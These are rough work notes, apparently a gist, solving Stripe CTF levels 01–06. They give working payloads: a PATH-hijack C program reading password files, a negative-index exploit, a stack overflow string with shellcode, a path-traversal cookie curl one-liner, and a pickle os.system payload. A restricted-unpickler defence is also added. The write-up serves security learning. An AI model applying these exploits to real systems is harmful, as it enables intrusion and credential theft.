Stripe CTF - Work Notes
mpetrov (petrov.michael@gmail.com)
These notes are very rough. They should give a general idea of how each level was solved.
---- LEVEL 01 (login: e9gx26YEb2) -----
Solution: modifying PATH env variable
Password: kxlVXUvzv
date.c
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h> /* system() */
/* compiled as "date" and picked up via the modified PATH (see Solution above) */
int main(void) {
    /* show which uid/gid this process actually runs with */
    printf(
        "          UID           GID\n"
        "Real      %d  Real      %d\n"
        "Effective %d  Effective %d\n",
        getuid(), getgid(),
        geteuid(), getegid()
    );
    system("ls -la /home/level02/");
    system("cat /home/level02/.password");
    return 0; /* always good to return something */
}
---- LEVEL 02 (login: kxlVXUvzv) -----
Solution: set cookie to: ../../home/level03/.password
Password: Or0m4UX07b
---- LEVEL 03 (login: Or0m4UX07b) -----
Solution: negative index exploit
Password: i5cBbPvPCpcP
ROUGH NOTES:
- target function (using nm): 0x804875b run
- use gdb to break in truncate_and_call
- step through a bit
- get pointer of buf
- compare to pointer of fns
- -0x70 difference, so the negative index exploit should work
- array pointers are 4 bytes apart
- run -26 $'./a.out\n\x5b\x87\x04\x08'
---- LEVEL 04 (login: i5cBbPvPCpcP) -----
Solution: buffer overflow exploit
Password: fzfDGnSmd317
ROUGH NOTES:
- some overflow...
- system is 0x890cec83
- "smashing the stack for fun and profit"
- brute force isolation of return pointer (1037th character)
| $'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xd0\x23\x5d\xf7AAAAAAAAAAAA' | |
- printf("Usage: ./level04 STRING"); the "./level04" string looked like the key (turned out to be irrelevant at the end)
- 0x080485b7: "./level04 STRING"
- gdb: x/x system 0xf75d23d0 <system>: 0x890cec83
- found "call *eax 804847f" in disassembly
- Shellcode creator: http://www.shell-storm.org/shellcode/files/utility-478.php
- Shellcode for "./a.out\n":
// 48 bytes
| $'\x60\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x68\x2d\x63\x63\x63\x89\xe1\x52\xeb\x07\x51\x53\x89\xe1\xcd\x80\x61\xe8\xf4\xff\xff\xff\x2e\x2f\x61\x2e\x6f\x75\x74\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x7f\x84\x04\x08AAAAAAAAAAAA' | |
---- LEVEL 05 (login: fzfDGnSmd317) -----
Solution: unpickle exploit
Password: SF2w8qU1QDj
ROUGH NOTES
- touch result.txt
- chmod 777 result.txt
- curl localhost:9020 -d $'test; job: cos\nsystem\n(S\'/tmp/tmp.jbvQGmqMNk/a.out\'\ntR.'
- exploit code (primitive but works):
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h> /* system() */
/* a.out, run by the unpickled os.system call above; results land in the world-writable result.txt */
int main(void) {
    printf(
        "          UID           GID\n"
        "Real      %d  Real      %d\n"
        "Effective %d  Effective %d\n",
        getuid(), getgid(),
        geteuid(), getegid()
    );
    system("ls -la /home/level06/ >> /tmp/tmp.jbvQGmqMNk/result.txt");
    system("cat /home/level06/.password >> /tmp/tmp.jbvQGmqMNk/result.txt");
    return 0; /* always good to return something */
}
cat result.txt
- SUCCESS!
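The level 05 payload works because the server hands client-supplied bytes to pickle.loads, which resolves the GLOBAL opcode "cos\nsystem\n" to os.system and then REDUCE calls it. As an added, defensive example (not the CTF's code and not from these notes), here is a restricted unpickler that refuses any global not on an allowlist; SAFE_GLOBALS, the sample payloads and the function names are assumptions constructed here.

```python
import io
import pickle

# Allowlist of (module, name) pairs a pickle stream may resolve. Nothing from
# os is listed, so a stream carrying "cos\nsystem\n" is refused before REDUCE
# ever gets a chance to call anything. (Constructed list, not from the page.)
SAFE_GLOBALS = {
    ("builtins", "set"),
    ("builtins", "frozenset"),
    ("collections", "OrderedDict"),
}


class RestrictedUnpickler(pickle.Unpickler):
    """Unpickler that only resolves explicitly allowlisted globals."""

    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL opcode, whichever protocol.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(
            f"refusing global {module}.{name} from untrusted pickle"
        )


def restricted_loads(data: bytes):
    """Deserialise untrusted bytes; raises UnpicklingError on forbidden globals."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_job_payload_safe(data: bytes) -> bool:
    """True if the stream deserialises without touching a forbidden global."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError:
        return False
    return True


# Constructed samples (not captured from the CTF server). HOSTILE_JOB has the
# same opcode shape as the page's payload but a harmless argument; it is never
# handed to plain pickle.loads() here.
BENIGN_JOB = pickle.dumps({"job": "cos", "n": 3})
HOSTILE_JOB = b"cos\nsystem\n(S'echo constructed'\ntR."

if __name__ == "__main__":
    print("benign:", is_job_payload_safe(BENIGN_JOB))    # True
    print("hostile:", is_job_payload_safe(HOSTILE_JOB))  # False
```

The allowlist only narrows the attack surface; for client-supplied job descriptions a format with no code-loading semantics (JSON) removes it entirely.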
---- LEVEL 06 (login: SF2w8qU1QDj) -----
Solution: timing attack on the fork system call
Details: https://gist.github.com/1899389
Password: theflagl0eFTtT5oi0nOTxO5
ROUGH NOTES:
- had to ssh through level05 for some reason (later was fixed)
- if stdout and stderr are blocking, then we can time their outputs and find where the wrong characters are
- http://stackoverflow.com/questions/280571/how-to-control-popen-stdin-stdout-stderr-redirection
- http://stackoverflow.com/questions/4057985/disabling-stdout-buffering-of-a-forked-process
- https://bugzilla.redhat.com/attachment.cgi?id=91467
evandrix commented Feb 24, 2012
One-liner for level 02: curl --digest -u level02 -b user_details='../../home/level03/.password' http://ctf.stri.pe/level02.php